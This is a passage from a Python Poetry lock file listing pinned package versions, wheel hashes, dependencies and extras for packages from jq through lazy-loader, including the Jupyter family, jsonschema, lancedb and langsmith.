"sha256:63db80b4803905a4f4f6c87a17aa1816c530f6262bc795773ebe60f8ab259092"}, {file = "jq-1.6.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:e2c1f429e644cb962e846a6157b5352c3c556fbd0b22bba9fc2fea0710333369"}, {file = "jq-1.6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:bcf574f28809ec63b8df6456fdd4a981751b7466851e80621993b4e9d3e3c8ee"}, {file = "jq-1.6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:49dbe0f003b411ca52b5d0afaf09cad8e430a1011181c86f2ef720a0956f31c1"}, {file = "jq-1.6.0-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9f5a9c4185269a5faf395aa7ca086c7b02c9c8b448d542be3b899041d06e0970"}, {file = "jq-1.6.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8265f3badcd125f234e55dfc02a078c5decdc6faafcd453fde04d4c0d2699886"}, {file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:c6c39b53d000d2f7f9f6338061942b83c9034d04f3bc99acae0867d23c9e7127"}, {file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:9897931ea7b9a46f8165ee69737ece4a2e6dbc8e10ececb81f459d51d71401df"}, {file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:6312237159e88e92775ea497e0c739590528062d4074544aacf12a08d252f966"}, {file = "jq-1.6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:aa786a60bdd1a3571f092a4021dd9abf6c46798530fa99f19ecf4f0fceaa7eaf"}, {file = "jq-1.6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22495573d8221320d3433e1aeded40132bd8e1726845629558bd73aaa66eef7b"}, {file = "jq-1.6.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:711eabc5d33ef3ec581e0744d9cff52f43896d84847a2692c287a0140a29c915"}, {file = "jq-1.6.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:57e75c1563d083b0424690b3c3ef2bb519e670770931fe633101ede16615d6ee"}, {file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:c795f175b1a13bd716a0c180d062cc8e305271f47bbdb9eb0f0f62f7e4f5def4"}, {file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:227b178b22a7f91ae88525810441791b1ca1fc71c86f03190911793be15cec3d"}, {file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:780eb6383fbae12afa819ef676fc93e1548ae4b076c004a393af26a04b460742"}, {file = "jq-1.6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:08ded6467f4ef89fec35b2bf310f210f8cd13fbd9d80e521500889edf8d22441"}, {file = "jq-1.6.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:49e44ed677713f4115bd5bf2dbae23baa4cd503be350e12a1c1f506b0687848f"}, {file = "jq-1.6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:984f33862af285ad3e41e23179ac4795f1701822473e1a26bf87ff023e5a89ea"}, {file = "jq-1.6.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f42264fafc6166efb5611b5d4cb01058887d050a6c19334f6a3f8a13bb369df5"}, {file = "jq-1.6.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a67154f150aaf76cc1294032ed588436eb002097dd4fd1e283824bf753a05080"}, {file = "jq-1.6.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:1b3b95d5fd20e51f18a42647fdb52e5d8aaf150b7a666dd659cf282a2221ee3f"}, {file = "jq-1.6.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:3a8d98f72111043e75610cad7fa9ec5aec0b1ee2f7332dc7fd0f6603ea8144f8"}, {file = "jq-1.6.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:487483f10ae8f70e6acf7723f31b329736de4b421ce56b2f43b46d5cbd7337b0"}, {file = "jq-1.6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:18a700f55b7ef83a1382edf0a48cb176b22bacd155e097375ef2345ff8621d97"}, {file = "jq-1.6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:68aec8534ac3c4705e524b4ef54f66b8bdc867df9e0af2c3895e82c6774b5374"}, {file = "jq-1.6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b7a164748dbd03bb06d23bab7ead7ba7e5c4fcfebea7b082bdcd21d14136931e"}, {file = "jq-1.6.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:aa22d24740276a8ce82411e4960ed2b5fab476230f913f9d9cf726f766a22208"}, {file = "jq-1.6.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4c1a6fae1b74b3e0478e281eb6addedad7b32421221ac685e21c1d49af5e997f"}, {file = "jq-1.6.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ce628546c22792b8870b9815086f65873ebb78d7bf617b5a16dd839adba36538"}, {file = "jq-1.6.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:7bb685f337cf5d4f4fe210c46220e31a7baec02a0ca0df3ace3dd4780328fc30"}, {file = "jq-1.6.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bdbbc509a35ee6082d79c1f25eb97c08f1c59043d21e0772cd24baa909505899"}, {file = "jq-1.6.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:1b332dfdf0d81fb7faf3d12aabf997565d7544bec9812e0ac5ee55e60ef4df8c"}, {file = "jq-1.6.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:3a4f6ef8c0bd19beae56074c50026665d66345d1908f050e5c442ceac2efe398"}, {file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5184c2fcca40f8f2ab1b14662721accf68b4b5e772e2f5336fec24aa58fe235a"}, {file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:689429fe1e07a2d6041daba2c21ced3a24895b2745326deb0c90ccab9386e116"}, {file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8405d1c996c83711570f16aac32e3bf2c116d6fa4254a820276b87aed544d7e8"}, {file = "jq-1.6.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:138d56c7efc8bb162c1cfc3806bd6b4d779115943af36c9e3b8ca644dde856c2"}, {file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fd28f8395687e45bba56dc771284ebb6492b02037f74f450176c102f3f4e86a3"}, {file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b2c783288bf10e67aad321b58735e663f4975d7ddfbfb0a5bca8428eee283bde"}, {file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:206391ac5b2eb556720b94f0f131558cbf8d82d8cc7e0404e733eeef48bcd823"}, {file = "jq-1.6.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:35090fea1283402abc3a13b43261468162199d8b5dcdaba2d1029e557ed23070"}, {file = "jq-1.6.0-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:201c6384603aec87a744ad7b393cc4f1c58ece23d6e0a6c216a47bfcc405d231"}, {file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a3d8b075351c29653f29a1fec5d31bc88aa198a0843c0a9550b9be74d8fab33b"}, {file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:132e41f6e988c42b91c04b1b60dd8fa185a5c0681de5438ea1e6c64f5329768c"}, {file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e1cb4751808b1d0dbddd37319e0c574fb0c3a29910d52ba35890b1343a1f1e59"}, {file = "jq-1.6.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:bd158911ed5f5c644f557ad94d6424c411560632a885eae47d105f290f0109cb"}, {file = "jq-1.6.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:64bc09ae6a9d9b82b78e15d142f90b816228bd3ee48833ddca3ff8c08e163fa7"}, {file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f4eed167322662f4b7e65235723c54aa6879f6175b6f9b68bc24887549637ffb"}, {file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:64bb4b305e2fabe5b5161b599bf934aceb0e0e7d3dd8f79246737ea91a2bc9ae"}, {file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:165bfbe29bf73878d073edf75f384b7da8a9657ba0ab9fb1e5fe6be65ab7debb"}, {file = "jq-1.6.0.tar.gz", hash = "sha256:c7711f0c913a826a00990736efa6ffc285f8ef433414516bb14b7df971d6c1ea"}, ] [[package]] name = "json5" version = "0.9.14" description = "A Python implementation of the JSON5 data format." optional = false python-versions = "*" files = [ {file = "json5-0.9.14-py2.py3-none-any.whl", hash = "sha256:740c7f1b9e584a468dbb2939d8d458db3427f2c93ae2139d05f47e453eae964f"}, {file = "json5-0.9.14.tar.gz", hash = "sha256:9ed66c3a6ca3510a976a9ef9b8c0787de24802724ab1860bc0153c7fdd589b02"}, ] [package.extras] dev = ["hypothesis"] [[package]] name = "jsonable" version = "0.3.1" description = "An abstract class that supports jsonserialization/deserialization." optional = true python-versions = "*" files = [ {file = "jsonable-0.3.1-py2.py3-none-any.whl", hash = "sha256:f7754dd27b4734e42e7f8a61c2336bc98082f715e31e29a061a95843b102dc3a"}, {file = "jsonable-0.3.1.tar.gz", hash = "sha256:137b676e8e5819fa58518678c3d1f5463cab7e8466f69b3641cbc438042eaee4"}, ] [[package]] name = "jsonlines" version = "4.0.0" description = "Library with helpers for the jsonlines file format" optional = true python-versions = ">=3.8" files = [ {file = "jsonlines-4.0.0-py3-none-any.whl", hash = "sha256:185b334ff2ca5a91362993f42e83588a360cf95ce4b71a73548502bda52a7c55"}, {file = "jsonlines-4.0.0.tar.gz", hash = "sha256:0c6d2c09117550c089995247f605ae4cf77dd1533041d366351f6f298822ea74"}, ] [package.dependencies] attrs = ">=19.2.0" [[package]] name = "jsonpatch" version = "1.33" description = "Apply JSON-Patches (RFC 6902)" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, !=3.6.*" files = [ {file = "jsonpatch-1.33-py2.py3-none-any.whl", hash = "sha256:0ae28c0cd062bbd8b8ecc26d7d164fbbea9652a1a3693f3b956c1eae5145dade"}, {file = "jsonpatch-1.33.tar.gz", hash = "sha256:9fcd4009c41e6d12348b4a0ff2563ba56a2923a7dfee731d004e212e1ee5030c"}, ] [package.dependencies] jsonpointer = ">=1.9" [[package]] name = "jsonpointer" version = "2.4" description = "Identify specific nodes in a JSON document (RFC 6901)" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, !=3.6.*" files = [ {file = "jsonpointer-2.4-py2.py3-none-any.whl", hash = "sha256:15d51bba20eea3165644553647711d150376234112651b4f1811022aecad7d7a"}, {file = "jsonpointer-2.4.tar.gz", hash = "sha256:585cee82b70211fa9e6043b7bb89db6e1aa49524340dde8ad6b63206ea689d88"}, ] [[package]] name = "jsonschema" version = "4.19.1" description = "An implementation of JSON Schema validation for Python" optional = false python-versions = ">=3.8" files = [ {file = "jsonschema-4.19.1-py3-none-any.whl", hash = "sha256:cd5f1f9ed9444e554b38ba003af06c0a8c2868131e56bfbef0550fb450c0330e"}, {file = "jsonschema-4.19.1.tar.gz", hash = "sha256:ec84cc37cfa703ef7cd4928db24f9cb31428a5d0fa77747b8b51a847458e0bbf"}, ] [package.dependencies] attrs = ">=22.2.0" fqdn = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} idna = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} importlib-resources = {version = ">=1.4.0", markers = "python_version < \"3.9\""} isoduration = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} jsonpointer = {version = ">1.13", optional = true, markers = "extra == \"format-nongpl\""} jsonschema-specifications = ">=2023.03.6" pkgutil-resolve-name = {version = ">=1.3.10", markers = "python_version < \"3.9\""} referencing = ">=0.28.4" rfc3339-validator = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} rfc3986-validator = {version = ">0.1.0", optional = true, markers = "extra == \"format-nongpl\""} rpds-py = ">=0.7.1" uri-template = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} webcolors = {version = ">=1.11", optional = true, markers = "extra == \"format-nongpl\""} [package.extras] format = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-validator", "rfc3987", "uri-template", "webcolors (>=1.11)"] format-nongpl = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-validator", "rfc3986-validator (>0.1.0)", "uri-template", "webcolors (>=1.11)"] [[package]] name = "jsonschema-specifications" version = "2023.7.1" description = "The JSON Schema meta-schemas and vocabularies, exposed as a Registry" optional = false python-versions = ">=3.8" files = [ {file = "jsonschema_specifications-2023.7.1-py3-none-any.whl", hash = "sha256:05adf340b659828a004220a9613be00fa3f223f2b82002e273dee62fd50524b1"}, {file = "jsonschema_specifications-2023.7.1.tar.gz", hash = "sha256:c91a50404e88a1f6ba40636778e2ee08f6e24c5613fe4c53ac24578a5a7f72bb"}, ] [package.dependencies] importlib-resources = {version = ">=1.4.0", markers = "python_version < \"3.9\""} referencing = ">=0.28.0" [[package]] name = "jupyter" version = "1.0.0" description = "Jupyter metapackage. Install all the Jupyter components in one go." optional = false python-versions = "*" files = [ {file = "jupyter-1.0.0-py2.py3-none-any.whl", hash = "sha256:5b290f93b98ffbc21c0c7e749f054b3267782166d72fa5e3ed1ed4eaf34a2b78"}, {file = "jupyter-1.0.0.tar.gz", hash = "sha256:d9dc4b3318f310e34c82951ea5d6683f67bed7def4b259fafbfe4f1beb1d8e5f"}, {file = "jupyter-1.0.0.zip", hash = "sha256:3e1f86076bbb7c8c207829390305a2b1fe836d471ed54be66a3b8c41e7f46cc7"}, ] [package.dependencies] ipykernel = "*" ipywidgets = "*" jupyter-console = "*" nbconvert = "*" notebook = "*" qtconsole = "*" [[package]] name = "jupyter-client" version = "8.5.0" description = "Jupyter protocol implementation and client libraries" optional = false python-versions = ">=3.8" files = [ {file = "jupyter_client-8.5.0-py3-none-any.whl", hash = "sha256:c3877aac7257ec68d79b5c622ce986bd2a992ca42f6ddc9b4dd1da50e89f7028"}, {file = "jupyter_client-8.5.0.tar.gz", hash = "sha256:e8754066510ce456358df363f97eae64b50860f30dc1fe8c6771440db3be9a63"}, ] [package.dependencies] importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" python-dateutil = ">=2.8.2" pyzmq = ">=23.0" tornado = ">=6.2" traitlets = ">=5.3" [package.extras] docs = ["ipykernel", "myst-parser", "pydata-sphinx-theme", "sphinx (>=4)", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"] test = ["coverage", "ipykernel (>=6.14)", "mypy", "paramiko", "pre-commit", "pytest", "pytest-cov", "pytest-jupyter[client] (>=0.4.1)", "pytest-timeout"] [[package]] name = "jupyter-console" version = "6.6.3" description = "Jupyter terminal console" optional = false python-versions = ">=3.7" files = [ {file = "jupyter_console-6.6.3-py3-none-any.whl", hash = "sha256:309d33409fcc92ffdad25f0bcdf9a4a9daa61b6f341177570fdac03de5352485"}, {file = "jupyter_console-6.6.3.tar.gz", hash = "sha256:566a4bf31c87adbfadf22cdf846e3069b59a71ed5da71d6ba4d8aaad14a53539"}, ] [package.dependencies] ipykernel = ">=6.14" ipython = "*" jupyter-client = ">=7.0.0" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" prompt-toolkit = ">=3.0.30" pygments = "*" pyzmq = ">=17" traitlets = ">=5.4" [package.extras] test = ["flaky", "pexpect", "pytest"] [[package]] name = "jupyter-core" version = "5.4.0" description = "Jupyter core package. A base package on which Jupyter projects rely." optional = false python-versions = ">=3.8" files = [ {file = "jupyter_core-5.4.0-py3-none-any.whl", hash = "sha256:66e252f675ac04dcf2feb6ed4afb3cd7f68cf92f483607522dc251f32d471571"}, {file = "jupyter_core-5.4.0.tar.gz", hash = "sha256:e4b98344bb94ee2e3e6c4519a97d001656009f9cb2b7f2baf15b3c205770011d"}, ] [package.dependencies] platformdirs = ">=2.5" pywin32 = {version = ">=300", markers = "sys_platform == \"win32\" and platform_python_implementation != \"PyPy\""} traitlets = ">=5.3" [package.extras] docs = ["myst-parser", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling", "traitlets"] test = ["ipykernel", "pre-commit", "pytest", "pytest-cov", "pytest-timeout"] [[package]] name = "jupyter-events" version = "0.8.0" description = "Jupyter Event System library" optional = false python-versions = ">=3.8" files = [ {file = "jupyter_events-0.8.0-py3-none-any.whl", hash = "sha256:81f07375c7673ff298bfb9302b4a981864ec64edaed75ca0fe6f850b9b045525"}, {file = "jupyter_events-0.8.0.tar.gz", hash = "sha256:fda08f0defce5e16930542ce60634ba48e010830d50073c3dfd235759cee77bf"}, ] [package.dependencies] jsonschema = {version = ">=4.18.0", extras = ["format-nongpl"]} python-json-logger = ">=2.0.4" pyyaml = ">=5.3" referencing = "*" rfc3339-validator = "*" rfc3986-validator = ">=0.1.1" traitlets = ">=5.3" [package.extras] cli = ["click", "rich"] docs = ["jupyterlite-sphinx", "myst-parser", "pydata-sphinx-theme", "sphinxcontrib-spelling"] test = ["click", "pre-commit", "pytest (>=7.0)", "pytest-asyncio (>=0.19.0)", "pytest-console-scripts", "rich"] [[package]] name = "jupyter-lsp" version = "2.2.0" description = "Multi-Language Server WebSocket proxy for Jupyter Notebook/Lab server" optional = false python-versions = ">=3.8" files = [ {file = "jupyter-lsp-2.2.0.tar.gz", hash = "sha256:8ebbcb533adb41e5d635eb8fe82956b0aafbf0fd443b6c4bfa906edeeb8635a1"}, {file = "jupyter_lsp-2.2.0-py3-none-any.whl", hash = "sha256:9e06b8b4f7dd50300b70dd1a78c0c3b0c3d8fa68e0f2d8a5d1fbab62072aca3f"}, ] [package.dependencies] importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} jupyter-server = ">=1.1.2" [[package]] name = "jupyter-server" version = "2.9.1" description = "The backend—i.e. core services, APIs, and REST endpoints—to Jupyter web applications." optional = false python-versions = ">=3.8" files = [ {file = "jupyter_server-2.9.1-py3-none-any.whl", hash = "sha256:21ad1a3d455d5a79ce4bef5201925cd17510c17898cf9d54e3ccfb6b12734948"}, {file = "jupyter_server-2.9.1.tar.gz", hash = "sha256:9ba71be4b9c16e479e4c50c929f8ac4b1015baf90237a08681397a98c76c7e5e"}, ] [package.dependencies] anyio = ">=3.1.0" argon2-cffi = "*" jinja2 = "*" jupyter-client = ">=7.4.4" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" jupyter-events = ">=0.6.0" jupyter-server-terminals = "*" nbconvert = ">=6.4.4" nbformat = ">=5.3.0" overrides = "*" packaging = "*" prometheus-client = "*" pywinpty = {version = "*", markers = "os_name == \"nt\""} pyzmq = ">=24" send2trash = ">=1.8.2" terminado = ">=0.8.3" tornado = ">=6.2.0" traitlets = ">=5.6.0" websocket-client = "*" [package.extras] docs = ["ipykernel", "jinja2", "jupyter-client", "jupyter-server", "myst-parser", "nbformat", "prometheus-client", "pydata-sphinx-theme", "send2trash", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-openapi (>=0.8.0)", "sphinxcontrib-spelling", "sphinxemoji", "tornado", "typing-extensions"] test = ["flaky", "ipykernel", "pre-commit", "pytest (>=7.0)", "pytest-console-scripts", "pytest-jupyter[server] (>=0.4)", "pytest-timeout", "requests"] [[package]] name = "jupyter-server-terminals" version = "0.4.4" description = "A Jupyter Server Extension Providing Terminals." optional = false python-versions = ">=3.8" files = [ {file = "jupyter_server_terminals-0.4.4-py3-none-any.whl", hash = "sha256:75779164661cec02a8758a5311e18bb8eb70c4e86c6b699403100f1585a12a36"}, {file = "jupyter_server_terminals-0.4.4.tar.gz", hash = "sha256:57ab779797c25a7ba68e97bcfb5d7740f2b5e8a83b5e8102b10438041a7eac5d"}, ] [package.dependencies] pywinpty = {version = ">=2.0.3", markers = "os_name == \"nt\""} terminado = ">=0.8.3" [package.extras] docs = ["jinja2", "jupyter-server", "mistune (<3.0)", "myst-parser", "nbformat", "packaging", "pydata-sphinx-theme", "sphinxcontrib-github-alt", "sphinxcontrib-openapi", "sphinxcontrib-spelling", "sphinxemoji", "tornado"] test = ["coverage", "jupyter-server (>=2.0.0)", "pytest (>=7.0)", "pytest-cov", "pytest-jupyter[server] (>=0.5.3)", "pytest-timeout"] [[package]] name = "jupyterlab" version = "4.0.7" description = "JupyterLab computational environment" optional = false python-versions = ">=3.8" files = [ {file = "jupyterlab-4.0.7-py3-none-any.whl", hash = "sha256:08683045117cc495531fdb39c22ababb9aaac6977a45e67cfad20046564c9c7c"}, {file = "jupyterlab-4.0.7.tar.gz", hash = "sha256:48792efd9f962b2bcda1f87d72168ff122c288b1d97d32109e4a11b33dc862be"}, ] [package.dependencies] async-lru = ">=1.0.0" importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} importlib-resources = {version = ">=1.4", markers = "python_version < \"3.9\""} ipykernel = "*" jinja2 = ">=3.0.3" jupyter-core = "*" jupyter-lsp = ">=2.0.0" jupyter-server = ">=2.4.0,<3" jupyterlab-server = ">=2.19.0,<3" notebook-shim = ">=0.2" packaging = "*" tomli = {version = "*", markers = "python_version < \"3.11\""} tornado = ">=6.2.0" traitlets = "*" [package.extras] dev = ["black[jupyter] (==23.7.0)", "build", "bump2version", "coverage", "hatch", "pre-commit", "pytest-cov", "ruff (==0.0.286)"] docs = ["jsx-lexer", "myst-parser", "pydata-sphinx-theme (>=0.13.0)", "pytest", "pytest-check-links", "pytest-tornasync", "sphinx (>=1.8,<7.2.0)", "sphinx-copybutton"] docs-screenshots = ["altair (==5.0.1)", "ipython (==8.14.0)", "ipywidgets (==8.0.6)", "jupyterlab-geojson (==3.4.0)", "jupyterlab-language-pack-zh-cn (==4.0.post0)", "matplotlib (==3.7.1)", "nbconvert (>=7.0.0)", "pandas (==2.0.2)", "scipy (==1.10.1)", "vega-datasets (==0.9.0)"] test = ["coverage", "pytest (>=7.0)", "pytest-check-links (>=0.7)", "pytest-console-scripts", "pytest-cov", "pytest-jupyter (>=0.5.3)", "pytest-timeout", "pytest-tornasync", "requests", "requests-cache", "virtualenv"] [[package]] name = "jupyterlab-pygments" version = "0.2.2" description = "Pygments theme using JupyterLab CSS variables" optional = false python-versions = ">=3.7" files = [ {file = "jupyterlab_pygments-0.2.2-py2.py3-none-any.whl", hash = "sha256:2405800db07c9f770863bcf8049a529c3dd4d3e28536638bd7c1c01d2748309f"}, {file = "jupyterlab_pygments-0.2.2.tar.gz", hash = "sha256:7405d7fde60819d905a9fa8ce89e4cd830e318cdad22a0030f7a901da705585d"}, ] [[package]] name = "jupyterlab-server" version = "2.25.0" description = "A set of server components for JupyterLab and JupyterLab like applications." optional = false python-versions = ">=3.8" files = [ {file = "jupyterlab_server-2.25.0-py3-none-any.whl", hash = "sha256:c9f67a98b295c5dee87f41551b0558374e45d449f3edca153dd722140630dcb2"}, {file = "jupyterlab_server-2.25.0.tar.gz", hash = "sha256:77c2f1f282d610f95e496e20d5bf1d2a7706826dfb7b18f3378ae2870d272fb7"}, ] [package.dependencies] babel = ">=2.10" importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} jinja2 = ">=3.0.3" json5 = ">=0.9.0" jsonschema = ">=4.18.0" jupyter-server = ">=1.21,<3" packaging = ">=21.3" requests = ">=2.31" [package.extras] docs = ["autodoc-traits", "jinja2 (<3.2.0)", "mistune (<4)", "myst-parser", "pydata-sphinx-theme", "sphinx", "sphinx-copybutton", "sphinxcontrib-openapi (>0.8)"] openapi = ["openapi-core (>=0.18.0,<0.19.0)", "ruamel-yaml"] test = ["hatch", "ipykernel", "openapi-core (>=0.18.0,<0.19.0)", "openapi-spec-validator (>=0.6.0,<0.7.0)", "pytest (>=7.0)", "pytest-console-scripts", "pytest-cov", "pytest-jupyter[server] (>=0.6.2)", "pytest-timeout", "requests-mock", "ruamel-yaml", "sphinxcontrib-spelling", "strict-rfc3339", "werkzeug"] [[package]] name = "jupyterlab-widgets" version = "3.0.9" description = "Jupyter interactive widgets for JupyterLab" optional = false python-versions = ">=3.7" files = [ {file = "jupyterlab_widgets-3.0.9-py3-none-any.whl", hash = "sha256:3cf5bdf5b897bf3bccf1c11873aa4afd776d7430200f765e0686bd352487b58d"}, {file = "jupyterlab_widgets-3.0.9.tar.gz", hash = "sha256:6005a4e974c7beee84060fdfba341a3218495046de8ae3ec64888e5fe19fdb4c"}, ] [[package]] name = "keras" version = "2.11.0" description = "Deep learning for humans." optional = true python-versions = ">=3.7" files = [ {file = "keras-2.11.0-py2.py3-none-any.whl", hash = "sha256:38c6fff0ea9a8b06a2717736565c92a73c8cd9b1c239e7125ccb188b7848f65e"}, ] [[package]] name = "lancedb" version = "0.1.16" description = "lancedb" optional = true python-versions = ">=3.8" files = [ {file = "lancedb-0.1.16-py3-none-any.whl", hash = "sha256:ed5ff765c127fd8c8b193b448a127ae9de4afd458874e6d981edeafa09cf6a4a"}, {file = "lancedb-0.1.16.tar.gz", hash = "sha256:c22621635ca1b74f24983b8247886f93d23d7477fdbe5c67449a0939c19ef7bd"}, ] [package.dependencies] aiohttp = "*" attr = "*" pydantic = "*" pylance = "0.5.10" ratelimiter = "*" retry = "*" semver = "*" tqdm = "*" [package.extras] dev = ["black", "pre-commit", "ruff"] docs = ["mkdocs", "mkdocs-jupyter", "mkdocs-material", "mkdocstrings[python]"] tests = ["pandas (>=1.4)", "pytest", "pytest-asyncio", "pytest-mock"] [[package]] name = "langkit" version = "0.0.22" description = "A collection of text metric udfs for whylogs profiling and monitoring in WhyLabs" optional = true python-versions = ">=3.8,<4" files = [ {file = "langkit-0.0.22-py3-none-any.whl", hash = "sha256:9f0f0a5311648f08adbb250dcd49ad761b1e3ee0834d860b8660f931f8b7d771"}, {file = "langkit-0.0.22.tar.gz", hash = "sha256:7a94a8c24e1838da913f999a0ad699971cdf7c31c179e6a8e6ba69b0f6e8570f"}, ] [package.dependencies] pandas = "*" textstat = ">=0.7.3,<0.8.0" whylogs = ">=1.3.9,<2.0.0" xformers = {version = "*", markers = "python_full_version >= \"3.8.0\" and python_version < \"4\" and sys_platform == \"!macos\""} [package.extras] all = ["datasets (>=2.12.0,<3.0.0)", "evaluate (>=0.4.0,<0.5.0)", "faiss-cpu (>=1.7.1,<2.0.0)", "ipywidgets (>=8.1.1,<9.0.0)", "nltk (>=3.8.1,<4.0.0)", "numpy", "openai (>=0.27.6,<0.28.0)", "sentence-transformers (>=2.2.2,<3.0.0)", "torch"] [[package]] name = "langsmith" version = "0.0.53" description = "Client library to connect to the LangSmith LLM Tracing and Evaluation Platform." optional = false python-versions = ">=3.8.1,<4.0" files = [ {file = "langsmith-0.0.53-py3-none-any.whl", hash = "sha256:a090b1c7d7968fb8d2476ddd608a5171f0e812a82b1bca29ca136cdea375a74e"}, {file = "langsmith-0.0.53.tar.gz", hash = "sha256:a426a1d39843207a5dd3d72787b5304376541eb818509ee7909bbb696b072488"}, ] [package.dependencies] pydantic = ">=1,<3" requests = ">=2,<3" [[package]] name = "lark" version = "1.1.8" description = "a modern parsing library" optional = false python-versions = ">=3.6" files = [ {file = "lark-1.1.8-py3-none-any.whl", hash = "sha256:7d2c221a66a8165f3f81aacb958d26033d40d972fdb70213ab0a2e0627e29c86"}, {file = "lark-1.1.8.tar.gz", hash = "sha256:7ef424db57f59c1ffd6f0d4c2b705119927f566b68c0fe1942dddcc0e44391a5"}, ] [package.extras] atomic-cache = ["atomicwrites"] interegular = ["interegular (>=0.3.1,<0.4.0)"] nearley = ["js2py"] regex = ["regex"] [[package]] name = "lazy-loader" version = "0.3" description = "lazy_loader" optional = true python-versions = ">=3.7" files = [ {file = "lazy_loader-0.3-py3-none-any.whl", hash = "sha256:1e9e76ee8631e264c62ce10006718e80b2cfc74340d17d1031e0f84af7478554"}, {file = 